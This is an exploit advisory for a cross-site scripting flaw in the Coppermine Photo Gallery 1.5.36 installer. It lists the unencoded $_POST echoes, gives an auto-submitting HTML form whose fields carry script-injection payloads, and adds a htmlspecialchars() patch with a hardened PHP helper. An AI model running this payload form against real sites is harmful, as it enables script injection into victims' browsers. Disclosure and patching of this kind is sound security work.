Coppermine Photo Gallery 1.5.36 Cross Site Scripting
Posted on 13 August 2015
[+] Exploit Title: Coppermine Photo Gallery 1.5.36 Cross Site Scripting
[+] Exploit Author: Ehsan Hosseini
[+] Date: 27/7/2015
[+] Vendor Homepage: http://coppermine-gallery.net/
[+] Software Link: http://sourceforge.net/projects/coppermine/files/Coppermine/1.5.x/cpg1.5.36.zip/download
[+] Version: 1.5.36
[+] Tested on: Windows
[+] CVE : N/A

===============================

Introduction :

Coppermine Photo Gallery is a multi-purpose, fully-featured and integrated web picture gallery script written in PHP. Coppermine Photo Gallery suffers from a cross-site scripting vulnerability: the installer script install_classic.php echoes POST parameters into HTML attribute values without encoding them.

===============================

Vulnerable file is :

localhost/cpg15x/install_classic.php

===============================

Vulnerable Code :

316 : <input type="text" class="textinput" name="admin_username" value="<?php echo $_POST['admin_username'] ?>" />
323 : <input type="text" class="textinput" name="admin_password" value="<?php echo $_POST['admin_password'] ?>" />
313 : <input type="text" class="textinput" name="admin_email" value="<?php echo $_POST['admin_email'] ?>" />
345 : <input type="text" class="textinput" name="dbserver" value="<?php echo ($_POST['dbserver'] ? $_POST['dbserver'] : 'localhost') ?>" />
352 : <input type="text" class="textinput" name="dbname" value="<?php echo $_POST['dbname'] ?>" />
359 : <input type="text" class="textinput" name="dbuser" value="<?php echo $_POST['dbuser'] ?>" />
366 : <input type="text" class="textinput" name="dbpass" value="<?php echo $_POST['dbpass'] ?>" />
373 : <input type="text" class="textinput" name="table_prefix" value="<?php echo ($_POST['table_prefix'] ? $_POST['table_prefix'] : 'cpg15x_') ?>" />
390 : <input type="text" class="textinput" name="impath" value="<?php echo $_POST['impath'] ?>" />

===============================

Exploit :

<body onload='document.exploit.submit()'>
<form name='exploit' action='http://localhost/cpg15x//install_classic.php' method='POST'>
<input type='hidden' name='admin_username' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='admin_password' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='admin_email' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbserver' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbname' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbuser' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbpass' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='table_prefix' value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='impath' value='"><script>alert(/EXPLOITED/)</script>'>
</form>

==================================================

Patch :

To fix this vulnerability, pass each echoed value through the htmlspecialchars() function before it is written into the attribute:

<input type="text" class="textinput" name="admin_username" value="<?php echo htmlspecialchars($_POST['admin_username']) ?>" />

Apply the same change to the other vulnerable lines listed above.

Discovered By : Ehsan Hosseini.
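A hardened rendering of the fields listed above, added here as an example and not taken from Coppermine's code. The helper names post_attr() and text_input() are assumed; the field names and defaults are the ones that appear in the vulnerable lines. Beyond a bare htmlspecialchars() call, it passes ENT_QUOTES (so the output is safe in single- and double-quoted attributes alike), fixes the charset, and tolerates missing or array-valued POST keys.

```php
<?php
// Added example (not Coppermine's own code): hardened output encoding for
// the install_classic.php form fields named in the advisory.

/**
 * Return $_POST[$key] encoded for use inside an HTML attribute value, or
 * $default (also encoded) when the field is absent, empty, or not a string.
 * ENT_QUOTES covers both quote styles, ENT_SUBSTITUTE replaces invalid UTF-8
 * instead of returning an empty string, and the charset is pinned to UTF-8.
 */
function post_attr(string $key, string $default = ''): string
{
    $raw = $_POST[$key] ?? '';
    if (!is_string($raw) || $raw === '') {
        $raw = $default;   // same fallback as the original ternaries
    }
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render one text input; both the name and the value are encoded. */
function text_input(string $name, string $default = ''): string
{
    $safe_name = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" class="textinput" name="' . $safe_name
        . '" value="' . post_attr($name, $default) . '" />';
}

// Fields and defaults taken from the vulnerable lines in the advisory.
$fields = [
    'admin_username' => '',
    'admin_password' => '',
    'admin_email'    => '',
    'dbserver'       => 'localhost',
    'dbname'         => '',
    'dbuser'         => '',
    'dbpass'         => '',
    'table_prefix'   => 'cpg15x_',
    'impath'         => '',
];

// Constructed sample input with the same shape as the advisory's payload;
// after encoding it is rendered as inert text inside the attribute.
$_POST['admin_username'] = '"><script>alert(/EXPLOITED/)</script>';

foreach ($fields as $name => $default) {
    echo text_input($name, $default), "\n";
}
```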